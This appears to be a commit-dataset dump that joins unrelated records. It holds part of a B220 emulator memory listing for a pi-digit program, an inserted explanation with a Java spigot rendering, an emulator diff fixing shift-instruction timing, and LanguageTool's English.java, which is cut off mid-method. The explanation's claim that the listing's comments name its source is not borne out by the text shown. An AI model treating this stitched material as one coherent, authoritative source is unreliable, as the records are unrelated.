0x00001480010; // SRT 10 this.MM[ 304]= 0x00000150375; // DIV FIVE A DIV 5 this.MM[ 305]= 0x00000420365; // LDB C FOR (B=C; B>=0; --B) this.MM[ 306]= 0x10000401000; // STA - F F[B]=A DIV 5 this.MM[ 307]= 0x00001210306; // DBB *-1,1 this.MM[ 308]= 0x00000100365; // L1 CAD C START OF OUTER LOOP this.MM[ 309]= 0x00000140374; // MUL TWO this.MM[ 310]= 0x00001400368; // STR G G=C*2 this.MM[ 311]= 0x00000370362; // BFR ENDL1,00,00 IF G EQL 0, BRANCH OUT OF LOOP this.MM[ 312]= 0x00000460366; // CLL D D=0 this.MM[ 313]= 0x00000100365; // CAD C this.MM[ 314]= 0x00000400364; // STA B B=C this.MM[ 315]= 0x00000420364; // LDB B this.MM[ 316]= 0x10000101000; // DO CAD - F START OF INNER LOOP this.MM[ 317]= 0x00000140363; // MUL A F[B]*A this.MM[ 318]= 0x00001490010; // SLT 10 SHIFT PRODUCT TO RA this.MM[ 319]= 0x00000120366; // ADD D this.MM[ 320]= 0x00000400366; // STA D D+=F[B]*A this.MM[ 321]= 0x00001480010; // SRT 10 SAVE NEW 
D IN RR this.MM[ 322]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 323]= 0x00000150368; // DIV G D DIV G this.MM[ 324]= 0x10001401000; // STR - F F[B]=D MOD G this.MM[ 325]= 0x00000400366; // STA D D=D DIV G this.MM[ 326]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 327]= 0x00000100364; // CAD B this.MM[ 328]= 0x00000130373; // SUB ONE this.MM[ 329]= 0x00000400364; // STA B B-=1 this.MM[ 330]= 0x00000360334; // BFA ENDDO,00,00 IF B EQL 0, BRANCH OUT OF INNER LOOP this.MM[ 331]= 0x00000140366; // MUL D this.MM[ 332]= 0x00001400366; // STR D D*=B this.MM[ 333]= 0x00001210316; // DBB DO,1 DECREMENT RB, REPEAT INNER LOOP IF >= 0 this.MM[ 334]= 0x00014270365; // ENDDO DFL C,00,14 C-=14 this.MM[ 335]= 0x00000100366; // CAD D this.MM[ 336]= 0x00001480010; // SRT 10 this.MM[ 337]= 0x00000150363; // DIV A D DIV A this.MM[ 338]= 0x00000120367; // ADD E RA=E+D DIV A this.MM[ 339]= 0x00001400367; // STR E E=D MOD A // FORMAT 4 DIGITS FOR SPO OUTPUT this.MM[ 340]= 0x00001480003; // SRT 3 ISOLATE HIGH-ORDER DIGIT IN A this.MM[ 341]= 0x00000120376; // ADD N80 CONVERT 1ST DIGIT TO ALPHA this.MM[ 342]= 0x00000490001; // SLA 1 this.MM[ 343]= 0x00001490001; // SLT 1 this.MM[ 344]= 0x00000120376; // ADD N80 CONVERT 2ND DIGIT TO ALPHA this.MM[ 345]= 0x00000490001; // SLA 1 this.MM[ 346]= 0x00001490001; // SLT 1 this.MM[ 347]= 0x00000120376; // ADD N80 CONVERT 3RD DIGIT TO ALPHA this.MM[ 348]= 0x00000490001; // SLA 1 this.MM[ 349]= 0x00001490001; // SLT 1 this.MM[ 350]= 0x00000120376; // ADD N80 CONVERT 4TH DIGIT TO ALPHA this.MM[ 351]= 0x00000490002; // SLA 2 INSERT TRAILING SPACE this.MM[ 352]= 0x00002430000; // LSA 2 SET SIGN TO TWO FOR ALPHA WORD this.MM[ 353]= 0x00000400364; // STA B STORE IN WORD BUFFER this.MM[ 354]= 0x00010090364; // SPO B,1 this.MM[ 355]= 0x00405260369; // IFL COL,04,1 CHECK FOR FULL LINE ON SPO this.MM[ 356]= 0x00000100369; // CAD COL this.MM[ 357]= 0x00000180370; // CFA ECOL this.MM[ 358]= 0x00001340308; // BCL L1 IF COL < ECOL, BRANCH this.MM[ 359]= 0x00010090377; // SPO CR,1 OUTPUT NEWLINES this.MM[ 360]= 0x00000460369; // CLL COL CLEAR COLUMN COUNTER this.MM[ 361]= 0x00000300308; // BUN L1 this.MM[ 362]= 0x00000007557; // ENDL1 HLT 7557 this.MM[ 363]= 0x00000010000; // A CNST 10000 this.MM[ 364]= 0x00000000000; // B CNST 0 this.MM[ 365]= 0x00000000000; // C CNST 0 this.MM[ 366]= 0x00000000000; // D CNST 0 this.MM[ 367]= 0x00000000000; // E CNST 0 this.MM[ 368]= 0x00000000000; // G CNST 0 this.MM[ 369]= 0x00000000000; // COL CNST 0 this.MM[ 370]= 0x00000000050; // ECOL CNST 50 this.MM[ 371]= 0x00000002800; // FLIM CNST 2800 this.MM[ 372]= 0x00000000000; // ZERO CNST 0 this.MM[ 373]= 0x00000000001; // ONE CNST 1 this.MM[ 374]= 0x00000000002; // TWO CNST 2 this.MM[ 375]= 0x00000000005; // FIVE CNST 5 this.MM[ 376]= 0x00000000080; // N80 CNST 80 this.MM[ 377]= 0x20202021616; // CR CNST 20202021616 NEWLINES this.MM[1000]= 0x00000000000; // F DEFN * ARRAY F[2800] // TEMP // Tape tests this.MM[ 400] = 0x1008500000; // MRW 1 this.MM[ 401] = 0x1002580000; // MPE 1 this.MM[ 402] = 0x1000540000; // MIW 0,1,10,100 this.MM[ 403] = 0x1750540100; // MIW 100,1,7,50 this.MM[ 404] = 0x1500550079; // MIR 79,1,5,00 this.MM[ 405] = 0x1101542000; // MIW 2000,1,1,1 // write an EOT block this.MM[ 406] = 0x1008500000; // MRW 1 this.MM[ 407] = 0x1000560000; // MOW 0,1,10,100 this.MM[ 408] = 0x1750560100; // MOW 100,1,7,50 this.MM[ 409] = 0x1500570079; // MOR 79,1,5,00 //this.MM[ 410] = 0x1101562000; // MOW 2000,1,1,1 this.MM[ 410] = 0x1110562000; // MOW 2000,1,1,10 // TEMP: block-length=10, should fire EOT 
control word this.MM[ 411] = 0x1008500000; // MRW 1 this.MM[ 412] = 0x1000523000; // MRD 3000,1,10,0 this.MM[ 413] = 0x1700524000; // MRD 4000,1,7,0 this.MM[ 414] = 0x1500534350; // MRR 4350,1,5,0 this.MM[ 415] = 0x1100534800; // MRR 4800,1,1,0 // should be an EOT block this.MM[ 416] = 0x1009500000; // MDA 1 this.MM[ 417] = 0x7777009999; // HLT 9999,7777 this.MM[ 79] = 0x1900000000; // preface for 19 words, 80-98 this.MM[ 99] = 0x4000000000; // preface for 40 words, 100-139 this.MM[ 140] = 0x5800000000; // preface for 58 words, 141-198 this.MM[ 199] = 0x9900000000; // preface for 99 words, 200-298 this.MM[ 299] = 0x0000000000; // preface for 100 words, 300-399 this.MM[2000] = 0x9920012002; // end-of-tape control word this.MM[2001] = 0x9999999999; // storage for end-of-tape block state this.MM[2002] = 0x9999008421; // HLT: target for end-of-tape control branch this.MM[2003] = 0x0000300411; // branch to read test sequence };
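The memory listing above (words 300 through 377) is, as its own comments note, a machine-language transcription of Dik Winter's well-known C spigot program for printing the first 800 digits of Pi. For readers who want the algorithm without the B220 opcodes, here is a compact Java rendering that follows the C original; the class name, variable comments, and output formatting are mine, and this is an illustration rather than anything taken from the emulator sources.

public class PiSpigot {
    public static void main(String[] args) {
        final int a = 10000;          // four decimal digits per output group
        int c = 2800;                 // mixed-radix terms; 2800/14*4 = 800 digits
        int e = 0;                    // carry from the previous group
        int[] f = new int[c + 1];     // the F array of the listing; f[c] stays 0 as in the C original
        for (int b = 0; b < c; b++) {
            f[b] = a / 5;             // F[B] = A DIV 5
        }
        StringBuilder out = new StringBuilder();
        while (c > 0) {
            int d = 0;
            int g = c * 2;
            for (int b = c; b > 0; b--) {
                d += f[b] * a;        // D += F[B]*A
                g--;
                f[b] = d % g;         // F[B] = D MOD G
                d /= g;               // D = D DIV G
                g--;
                if (b > 1) {
                    d *= b - 1;       // D *= B, after B has been decremented
                }
            }
            c -= 14;                  // each outer pass yields one four-digit group
            out.append(String.format("%04d", e + d / a));
            e = d % a;                // E = D MOD A, carried into the next group
        }
        System.out.println(out);      // prints 3141592653589793...
    }
}

The B220 listing appears to differ only in bookkeeping, not in the arithmetic: it also fills F[2800] during initialization and converts each four-digit group to alpha characters for SPO output.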
Release emulator version 1.03. Fix bug in SLS for rotate counts > 10, as revealed by the TR1203 Operations Test diagnostic.
emulator/B220Processor.js
Release emulator version 1.03.
<ide><path>mulator/B220Processor.js <ide> * Global Constants * <ide> ***********************************************************************/ <ide> <del>B220Processor.version = "1.02a"; <add>B220Processor.version = "1.03"; <ide> <ide> B220Processor.tick = 1000/200000; // milliseconds per clock cycle (200KHz) <ide> B220Processor.cyclesPerMilli = 1/B220Processor.tick; <ide> switch (this.CCONTROL%0x10) { <ide> case 1: // SLT: Shift Left A and R <ide> x = this.CADDR % 0x20; <del> if (x < 0x10) { <del> this.opTime = 0.210 - x*0.005; <del> } else { <del> this.opTime = 0.160 - (x-0x10)*0.005; <del> } <del> <add> this.opTime = 0.210 - x*0.005; <ide> this.DC.set(x); <del> w = this.R.value % 0x10000000000; // R sign is not affected <del> this.A.value %= 0x10000000000; // discard the A sign <add> w = this.R.value % 0x10000000000; // the R sign is not affected <add> this.A.value %= 0x10000000000; // discard the A sign for now <ide> while (this.DC.value < 0x20) { <ide> d = w % 0x10; <ide> w = (w-d)/0x10 + (this.A.value%0x10)*0x1000000000; <ide> this.R.set(this.R.value - this.R.value%0x10000000000 + w); // restore the R sign <ide> break; <ide> case 2: // SLS: Shift Left A with Sign <del> x = this.CADDR % 0x10; <add> w = this.A.value % 0x100000000000; // the A sign is included in the rotate <add> d = w % 0x10; // always do one more rotate right <add> w = (w-d)/0x10 + d*0x10000000000; // than the count calls for <add> x = this.CADDR % 0x20; <add> if (x >= 0x10) { <add> x -= 0x10; // if the count is at least 10 <add> d = w % 0x10; // do one additional rotate right <add> w = (w-d)/0x10 + d*0x10000000000; <add> } <add> <ide> this.opTime = 0.160 - x*0.005; <ide> this.DC.set(0x10+x); <del> w = this.A.value % 0x100000000000; // A sign is included <del> d = w % 0x10; // do one more rotate right <del> w = (w-d)/0x10 + d*0x10000000000; // than the count calls for <ide> while (this.DC.value < 0x20) { <ide> d = w % 0x10; <ide> w = (w-d)/0x10 + d*0x10000000000; <ide> x = this.CADDR % 0x10; <ide> this.opTime = 0.160 - x*0.005; <ide> this.DC.set(0x10+x); <del> w = this.A.value % 0x10000000000; // A sign is not affected <add> w = this.A.value % 0x10000000000; // discard the A sign for now <ide> while (this.DC.value < 0x20) { <ide> d = w % 0x10; <ide> w = (w-d)/0x10 + d*0x1000000000;
Java
lgpl-2.1
cfa2242291cece3d71a6befa6fdb7a0e182adf1b
0
languagetool-org/languagetool,languagetool-org/languagetool,languagetool-org/languagetool,languagetool-org/languagetool,languagetool-org/languagetool
/* LanguageTool, a natural language style checker * Copyright (C) 2007 Daniel Naber (http://www.danielnaber.de) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 * USA */ package org.languagetool.language; import com.google.common.cache.CacheBuilder; import com.google.common.cache.CacheLoader; import com.google.common.cache.LoadingCache; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import org.languagetool.*; import org.languagetool.chunking.Chunker; import org.languagetool.chunking.EnglishChunker; import org.languagetool.languagemodel.LanguageModel; import org.languagetool.rules.*; import org.languagetool.rules.en.*; import org.languagetool.rules.neuralnetwork.NeuralNetworkRuleCreator; import org.languagetool.rules.neuralnetwork.Word2VecModel; import org.languagetool.rules.patterns.PatternRuleLoader; import org.languagetool.synthesis.Synthesizer; import org.languagetool.synthesis.en.EnglishSynthesizer; import org.languagetool.tagging.Tagger; import org.languagetool.tagging.disambiguation.Disambiguator; import org.languagetool.tagging.en.EnglishHybridDisambiguator; import org.languagetool.tagging.en.EnglishTagger; import org.languagetool.tokenizers.SRXSentenceTokenizer; import org.languagetool.tokenizers.SentenceTokenizer; import org.languagetool.tokenizers.Tokenizer; import org.languagetool.tokenizers.en.EnglishWordTokenizer; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.ResourceBundle; import java.util.concurrent.TimeUnit; import java.util.function.Function; /** * Support for English - use the sub classes {@link BritishEnglish}, {@link AmericanEnglish}, * etc. if you need spell checking. * Make sure to call {@link #close()} after using this (currently only relevant if you make * use of {@link EnglishConfusionProbabilityRule}). */ public class English extends Language implements AutoCloseable { private static final LoadingCache<String, List<Rule>> cache = CacheBuilder.newBuilder() .expireAfterWrite(30, TimeUnit.MINUTES) .build(new CacheLoader<String, List<Rule>>() { @Override public List<Rule> load(@NotNull String path) throws IOException { List<Rule> rules = new ArrayList<>(); PatternRuleLoader loader = new PatternRuleLoader(); try (InputStream is = JLanguageTool.getDataBroker().getAsStream(path)) { rules.addAll(loader.getRules(is, path)); } return rules; } }); private static final Language AMERICAN_ENGLISH = new AmericanEnglish(); private LanguageModel languageModel; /** * @deprecated use {@link AmericanEnglish} or {@link BritishEnglish} etc. 
instead - * they have rules for spell checking, this class doesn't (deprecated since 3.2) */ @Deprecated public English() { } @Override public Language getDefaultLanguageVariant() { return AMERICAN_ENGLISH; } @Override public SentenceTokenizer createDefaultSentenceTokenizer() { return new SRXSentenceTokenizer(this); } @Override public String getName() { return "English"; } @Override public String getShortCode() { return "en"; } @Override public String[] getCountries() { return new String[]{}; } @NotNull @Override public Tagger createDefaultTagger() { return EnglishTagger.INSTANCE; } @Nullable @Override public Chunker createDefaultChunker() { return new EnglishChunker(); } @Nullable @Override public Synthesizer createDefaultSynthesizer() { return new EnglishSynthesizer(this); } @Override public Disambiguator createDefaultDisambiguator() { return new EnglishHybridDisambiguator(); } @Override public Tokenizer createDefaultWordTokenizer() { return new EnglishWordTokenizer(); } @Override public synchronized LanguageModel getLanguageModel(File indexDir) throws IOException { languageModel = initLanguageModel(indexDir, languageModel); return languageModel; } @Override public synchronized Word2VecModel getWord2VecModel(File indexDir) throws IOException { return new Word2VecModel(indexDir + File.separator + getShortCode()); } @Override public Contributor[] getMaintainers() { return new Contributor[] { new Contributor("Mike Unwalla"), Contributors.MARCIN_MILKOWSKI, Contributors.DANIEL_NABER }; } @Override public LanguageMaintainedState getMaintainedState() { return LanguageMaintainedState.ActivelyMaintained; } @Override public List<Rule> getRelevantRules(ResourceBundle messages, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { List<Rule> allRules = new ArrayList<>(); if (motherTongue != null) { if ("de".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-de.xml")); } else if ("fr".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-fr.xml")); } } allRules.addAll(Arrays.asList( new CommaWhitespaceRule(messages, Example.wrong("We had coffee<marker> ,</marker> cheese and crackers and grapes."), Example.fixed("We had coffee<marker>,</marker> cheese and crackers and grapes.")), new DoublePunctuationRule(messages), new UppercaseSentenceStartRule(messages, this, Example.wrong("This house is old. <marker>it</marker> was built in 1950."), Example.fixed("This house is old. 
<marker>It</marker> was built in 1950.")), new MultipleWhitespaceRule(messages, this), new SentenceWhitespaceRule(messages), new WhiteSpaceBeforeParagraphEnd(messages, this), new WhiteSpaceAtBeginOfParagraph(messages), new EmptyLineRule(messages, this), new LongSentenceRule(messages, userConfig, 40), new LongParagraphRule(messages, this, userConfig), new ParagraphRepeatBeginningRule(messages, this), new PunctuationMarkAtParagraphEnd(messages, this), new PunctuationMarkAtParagraphEnd2(messages, this), // specific to English: new ConsistentApostrophesRule(messages), new EnglishSpecificCaseRule(messages), new EnglishUnpairedBracketsRule(messages, this), new EnglishWordRepeatRule(messages, this), new AvsAnRule(messages), new EnglishWordRepeatBeginningRule(messages, this), new CompoundRule(messages), new ContractionSpellingRule(messages), new EnglishWrongWordInContextRule(messages), new EnglishDashRule(messages), new WordCoherencyRule(messages), new EnglishDiacriticsRule(messages), new EnglishPlainEnglishRule(messages), new EnglishRedundancyRule(messages), new SimpleReplaceRule(messages, this), new ReadabilityRule(messages, this, userConfig, false), new ReadabilityRule(messages, this, userConfig, true) )); return allRules; } @Override public List<Rule> getRelevantLanguageModelRules(ResourceBundle messages, LanguageModel languageModel, UserConfig userConfig) throws IOException { return Arrays.asList( new UpperCaseNgramRule(messages, languageModel, this, userConfig), new EnglishConfusionProbabilityRule(messages, languageModel, this), new EnglishNgramProbabilityRule(messages, languageModel, this) ); } @Override public List<Rule> getRelevantLanguageModelCapableRules(ResourceBundle messages, @Nullable LanguageModel lm, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { if (lm != null && motherTongue != null && "fr".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForFrenchFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "de".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForGermansFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "es".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForSpaniardsFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "nl".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForDutchmenFalseFriendRule(messages, lm, motherTongue, this) ); } return Arrays.asList(); } @Override public boolean hasNGramFalseFriendRule(Language motherTongue) { return motherTongue != null && ( // Note: extend EnglishForL2SpeakersFalseFriendRuleTest.testMessageDetailData() // if you add a language here "de".equals(motherTongue.getShortCode()) || "fr".equals(motherTongue.getShortCode()) || "es".equals(motherTongue.getShortCode()) || "nl".equals(motherTongue.getShortCode())); } @Override public List<Rule> getRelevantWord2VecModelRules(ResourceBundle messages, Word2VecModel word2vecModel) throws IOException { return NeuralNetworkRuleCreator.createRules(messages, this, word2vecModel); } /** @since 5.1 */ @Override public String getOpeningDoubleQuote() { return "“"; } /** @since 5.1 */ @Override public String getClosingDoubleQuote() { return "”"; } /** @since 5.1 */ @Override public String getOpeningSingleQuote() { return "‘"; } /** @since 5.1 */ @Override public String getClosingSingleQuote() { return 
"’"; } /** @since 5.1 */ @Override public boolean isAdvancedTypographyEnabled() { return true; } /** * Closes the language model, if any. * @since 2.7 */ @Override public void close() throws Exception { if (languageModel != null) { languageModel.close(); } } @Override protected int getPriorityForId(String id) { switch (id) { case "I_E": return 10; // needs higher prio than EN_COMPOUNDS ("i.e learning") case "EN_DIACRITICS_REPLACE": return 9; // prefer over spell checker (like PHRASE_REPETITION) case "CHILDISH_LANGUAGE": return 8; // prefer over spell checker case "RUDE_SARCASTIC": return 6; // prefer over spell checker case "FOR_NOUN_SAKE": return 6; // prefer over PROFANITY (e.g. "for fuck sake") case "YEAR_OLD_HYPHEN": return 6; // higher prio than MISSING_HYPHEN case "MISSING_HYPHEN": return 5; case "TRANSLATION_RULE": return 5; // Premium case "WRONG_APOSTROPHE": return 5; case "DOS_AND_DONTS": return 3; case "EN_COMPOUNDS": return 2; case "ABBREVIATION_PUNCTUATION": return 2; case "FEDEX": return 2; // higher prio than many verb rules (e.g. MD_BASEFORM) case "LIFE_COMPOUNDS": return 1; case "DRIVE_THROUGH_HYPHEN": return 1; // higher prio than agreement rules case "CAUSE_COURSE": return 1; // higher prio than CAUSE_BECAUSE case "AN_AND": return 1; // higher prio than A_MY and DT_PRP case "HER_S": return 1; // higher prio than THEIR_S case "COVID_19": return 1; case "OTHER_WISE_COMPOUND": return 1; case "ON_EXCEL": return 1; case "IF_VB_PCT": return 1; // higher prio than IF_VB case "CAUSE_BECAUSE": return 1; // higher prio than MISSING_TO_BETWEEN_BE_AND_VB case "MAY_MANY": return 1; // higher prio than MAY_MANY_MY case "BOUT_TO": return 1; // higher prio than PRP_VB case "HAVE_HAVE": return 1; // higher prio than HE_D_VBD case "LUV": return 1; // higher prio than spell checker case "DAT": return 1; // higher prio than spell checker case "MAC_OS": return 1; // higher prio than spell checker case "BESTEST": return 1; // higher prio than spell checker case "OFF_OF": return 1; // higher prio than ADJECTIVE_ADVERB case "SHELL_COMPOUNDS": return 1; // higher prio than HELL case "HANDS_ON_HYPHEN": return 1; // higher prio than A_NNS case "QUIET_QUITE": return 1; // higher prio than A_QUITE_WHILE case "A_OK": return 1; // prefer over A_AN case "I_A": return 1; // higher prio than I_IF case "GOT_GO": return 1; // higher prio than MD_BASEFORM case "THERE_FORE": return 1; // higher prio than FORE_FOR case "PRP_NO_VB": return 1; // higher prio than I_IF case "FOLLOW_UP": return 1; // higher prio than MANY_NN case "IT_SOMETHING": return 1; // higher prio than IF_YOU_ANY and IT_THE_PRP case "NO_KNOW": return 1; // higher prio than DOUBLE_NEGATIVE case "WILL_BASED_ON": return 1; // higher prio than MD_BASEFORM / PRP_PAST_PART case "DON_T_AREN_T": return 1; // higher prio than DID_BASEFORM case "WILL_BECOMING": return 1; // higher prio than MD_BASEFORM case "WOULD_NEVER_VBN": return 1; // higher prio than MD_BASEFORM case "MD_APPRECIATED": return 1; // higher prio than MD_BASEFORM case "MONEY_BACK_HYPHEN": return 1; // higher prio than A_UNCOUNTABLE case "WORLDS_BEST": return 1; // higher prio than THE_SUPERLATIVE case "STEP_COMPOUNDS": return 1; // higher prio than STARS_AND_STEPS case "WON_T_TO": return 1; // higher prio than DON_T_AREN_T case "WAN_T": return 1; // higher prio than DON_T_AREN_T case "THE_US": return 1; // higher prio than DT_PRP case "THE_IT": return 1; // higher prio than DT_PRP case "THANK_YOU_MUCH": return 1; // higher prio than other rules case "TO_DO_HYPHEN": return 1; // 
higher prio than other rules case "A_NUMBER_NNS": return 1; // higher prio than A_NNS case "A_HUNDREDS": return 1; // higher prio than A_NNS case "NOW_A_DAYS": return 1; // higher prio than A_NNS case "COUPLE_OF_TIMES": return 1; // higher prio than A_NNS case "A_WINDOWS": return 1; // higher prio than A_NNS case "A_SCISSOR": return 1; // higher prio than A_NNS case "A_SNICKERS": return 1; // higher prio than A_NNS case "ROUND_A_BOUT": return 1; // higher prio than A_NNS case "A_NNS_BEST_NN": return 1; // higher prio than A_NNS case "A_BACHELORS_IN": return 1; // higher prio than A_NNS case "NEITHER_NOR": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "FOR_AWHILE": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "A_BUT": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "MAY_BE": return 1; // higher prio than IS_IT_MAY (premium rule) case "BORN_IN": return 1; // higher prio than PRP_PAST_PART case "DO_TO": return 1; // higher prio than HAVE_PART_AGREEMENT case "CURIOS_CURIOUS": return 1; // higher prio than A_NNS and POSSESSIVE_APOSTROPHE case "INCORRECT_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "THIS_YEARS_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "SPURIOUS_APOSTROPHE": return 1; // higher prio than THIS_NNS case "IN_THIS_REGARDS": return 1; // higher prio than THIS_NNS case "NO_WHERE": return 1; // higher prio than NOW case "APOSTROPHE_VS_QUOTE": return 1; // higher prio than EN_QUOTES case "COMMA_PERIOD": return 1; // higher prio than COMMA_PARENTHESIS_WHITESPACE case "HERE_HEAR": return 1; // higher prio than ENGLISH_WORD_REPEAT_RULE case "LIGATURES": return 1; // prefer over spell checker case "APPSTORE": return 1; // prefer over spell checker case "INCORRECT_CONTRACTIONS": return 1; // prefer over EN_CONTRACTION_SPELLING case "DONT_T": return 1; // prefer over EN_CONTRACTION_SPELLING case "WHATS_APP": return 1; // prefer over EN_CONTRACTION_SPELLING case "NON_STANDARD_COMMA": return 1; // prefer over spell checker case "NON_STANDARD_ALPHABETIC_CHARACTERS": return 1; // prefer over spell checker case "WONT_CONTRACTION": return 1; // prefer over WONT_WANT case "YOU_GOOD": return 1; // prefer over PRP_PAST_PART case "THAN_THANK": return 1; // prefer over THAN_THEN case "CD_NN_APOSTROPHE_S": return 1; // prefer over CD_NN and LOWERCASE_NAME_APOSTROPHE_S case "IT_IF": return 1; // needs higher prio than PRP_COMMA and IF_YOU_ANY case "FINE_TUNE_COMPOUNDS": return 1; // prefer over less specific rules case "WHAT_IS_YOU": return 1; // prefer over HOW_DO_I_VB, NON3PRS_VERB case "SUPPOSE_TO": return 1; // prefer over HOW_DO_I_VB case "SEEN_SEEM": return 1; // prefer over PRP_PAST_PART case "PROFANITY": return 1; // prefer over spell checker (less prio than EN_COMPOUNDS) case "THE_THEM": return 1; // prefer over TO_TWO case "THERE_THEIR": return 1; // prefer over GO_TO_HOME case "IT_IS_DEPENDING_ON": return 1; // prefer over PROGRESSIVE_VERBS case "IRREGARDLESS": return 1; // prefer over spell checker case "WANNA": return 1; // prefer over spell checker case "LOOK_FORWARD_TO": return 1; // prefer over LOOK_FORWARD_NOT_FOLLOWED_BY_TO case "LOOK_SLIKE": return 1; // higher prio than prem:SINGULAR_NOUN_VERB_AGREEMENT case "ANYWAYS": return -1; // higher prio than spell checker case "MISSING_GENITIVE": return -1; // prefer over spell checker (like EN_SPECIFIC_CASE) case "EN_UNPAIRED_BRACKETS": return -1; // less priority than rules that suggest the correct brackets case "NEEDS_FIXED": return -1; // less priority 
than MISSING_TO_BEFORE_A_VERB case "BLACK_SEA": return -1; // less priority than SEA_COMPOUNDS case "A_TO": return -1; // less priority than other rules that offer suggestions case "MANY_NN": return -1; // less priority than PUSH_UP_HYPHEN, SOME_FACULTY case "WE_BE": return -1; case "A_LOT_OF_NN": return -1; case "IT_VBZ": return -1; case "ORDER_OF_WORDS_WITH_NOT": return -1; // less prio than punctuation rules case "ADVERB_WORD_ORDER_10_TEMP": return 1; case "ADVERB_WORD_ORDER": return -1; // less prio than PRP_PAST_PART // case "IT_IS_2": return -1; // needs higher prio than BEEN_PART_AGREEMENT case "A_RB_NN": return -1; // prefer other more specific rules (e.g. QUIET_QUITE, A_QUITE_WHILE) case "DT_RB_IN": return -1; // prefer other more specific rules case "VERB_NOUN_CONFUSION": return -1; // prefer other more specific rules case "NOUN_VERB_CONFUSION": return -1; // prefer other more specific rules case "PLURAL_VERB_AFTER_THIS": return -1; // prefer other more specific rules (e.g. COMMA_TAG_QUESTION) case "BE_RB_BE": return -1; // prefer other more specific rules case "IT_ITS": return -1; // prefer other more specific rules case "ENGLISH_WORD_REPEAT_RULE": return -1; // prefer other more specific rules (e.g. IT_IT) case "PRP_MD_NN": return -1; // prefer other more specific rules (e.g. MD_ABLE, WONT_WANT) case "NON_ANTI_PRE_JJ": return -1; // prefer other more specific rules case "DT_JJ_NO_NOUN": return -1; // prefer other more specific rules (e.g. THIRD_PARTY) case "AGREEMENT_SENT_START": return -1; // prefer other more specific rules case "HAVE_PART_AGREEMENT": return -1; // prefer other more specific rules case "PREPOSITION_VERB": return -1; // prefer other more specific rules case "EN_A_VS_AN": return -1; // prefer other more specific rules (with suggestions, e.g. AN_ALSO) case "CD_NN": return -1; // prefer other more specific rules (with suggestions) case "ATD_VERBS_TO_COLLOCATION": return -1; // prefer other more specific rules (with suggestions) case "ADVERB_OR_HYPHENATED_ADJECTIVE": return -1; // prefer other more specific rules (with suggestions) case "GOING_TO_VBD": return -1; // prefer other more specific rules (with suggestions, e.g. GOING_TO_JJ) case "MISSING_PREPOSITION": return -1; // prefer other more specific rules (with suggestions) case "BE_TO_VBG": return -1; // prefer other more specific rules (with suggestions) case "NON3PRS_VERB": return -1; // prefer other more specific rules (with suggestions, e.g. DONS_T) case "DID_FOUND_AMBIGUOUS": return -1; // prefer other more specific rules (e.g. TWO_CONNECTED_MODAL_VERBS) case "BE_I_BE_GERUND": return -1; // prefer other more specific rules (with suggestions) case "VBZ_VBD": return -1; // prefer other more specific rules (e.g. 
IS_WAS) case "SUPERLATIVE_THAN": return -1; // prefer other more specific rules case "UNLIKELY_OPENING_PUNCTUATION": return -1; // prefer other more specific rules case "METRIC_UNITS_EN_IMPERIAL": return -1; // prefer MILE_HYPHEN case "METRIC_UNITS_EN_GB": return -1; // prefer MILE_HYPHEN case "COMMA_COMPOUND_SENTENCE": return -1; // prefer other rules case "COMMA_COMPOUND_SENTENCE_2": return -1; // prefer other rules case "REPEATED_VERBS": return -1; // prefer other rules case "PRP_RB_NO_VB": return -2; // prefer other more specific rules (with suggestions) case "PRP_VBG": return -2; // prefer other more specific rules (with suggestions, prefer over HE_VERB_AGR) case "PRP_VBZ": return -2; // prefer other more specific rules (with suggestions) case "BE_VBP_IN": return -2; // prefer over BEEN_PART_AGREEMENT case "BEEN_PART_AGREEMENT": return -3; // prefer other more specific rules (e.g. VARY_VERY, VB_NN) case "A_INFINITIVE": return -3; // prefer other more specific rules (with suggestions, e.g. PREPOSITION_VERB, THE_TO) case "HE_VERB_AGR": return -3; // prefer other more specific rules (e.g. PRP_VBG) case "PRP_JJ": return -3; // prefer other rules (e.g. PRP_VBG, IT_IT and ADJECTIVE_ADVERB, PRP_ABLE, PRP_NEW, MD_IT_JJ) case "PRONOUN_NOUN": return -3; // prefer other rules (e.g. PRP_VB, PRP_JJ) case "INDIAN_ENGLISH": return -3; // prefer grammar rules, but higher prio than spell checker case "GONNA_TEMP": return -3; case "PRP_THE": return -4; // prefer other rules (e.g. I_A, PRP_JJ, IF_YOU_ANY, I_AN) case "GONNA": return -4; // prefer over spelling rules case "WHATCHA": return -4; // prefer over spelling rules case "DONTCHA": return -4; // prefer over spelling rules case "GOTCHA": return -4; // prefer over spelling rules case "OUTTA": return -4; // prefer over spelling rules case "Y_ALL": return -4; // prefer over spelling rules case "GIMME": return -4; // prefer over spelling rules case "LEMME": return -4; // prefer over spelling rules case "MORFOLOGIK_RULE_EN_US": return -10; // more specific rules (e.g. L2 rules) have priority case 